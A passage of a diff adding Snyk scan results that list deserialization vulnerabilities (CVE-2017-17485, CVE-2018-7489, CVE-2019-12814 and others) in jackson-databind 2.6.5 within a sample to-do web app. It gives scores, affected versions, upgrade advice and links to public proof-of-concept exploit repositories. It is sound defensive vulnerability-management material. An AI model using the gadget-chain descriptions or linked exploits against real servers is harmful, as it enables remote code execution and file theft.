"SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Imre Rad" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1855", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/irsl/jackson-rce-via-spel/", + "title": "PoC Project" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.686860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", + "epssDetails": { + "percentile": "0.95701", + "probability": "0.13977", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-17485" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-11T11:41:28.547000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-10T11:41:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-22T12:30:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:58.597489Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Rui Chong" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1899", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:07.715996Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", + "epssDetails": { + "percentile": "0.94704", + "probability": "0.09270", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-5968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-w3f4-3q6j-rh82" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-22T15:40:18.105000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-18T15:40:18Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-23T13:17:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.857985Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.5)", + "[2.7.0, 2.8.11.1)", + "[2.9.0, 2.9.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.5", + "2.8.11.1", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1931", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.859910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", + "epssDetails": { + "percentile": "0.99133", + "probability": "0.93631", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-7489" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cggj-fvv3-cqwv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-02-26T15:13:40.723000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-02-10T15:13:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-02-26T15:13:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.486075Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2341", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12814", + "title": "PoC Repository" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:15.371549Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", + "epssDetails": { + "percentile": "0.87218", + "probability": "0.01539", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12814" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cmfg-87vq-g5g4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-19T15:28:46.421239Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-06-19T14:34:16Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-19T14:34:16Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.077144Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "College of software Nankai University" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", + "title": "Debian Security Announcement" + }, + { + "url": "https://github.com/jas502n/CVE-2019-12384", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "title": "Github Fix" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2334", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Jackson CVEs Don't Panic - Blog" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", + "title": "Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + 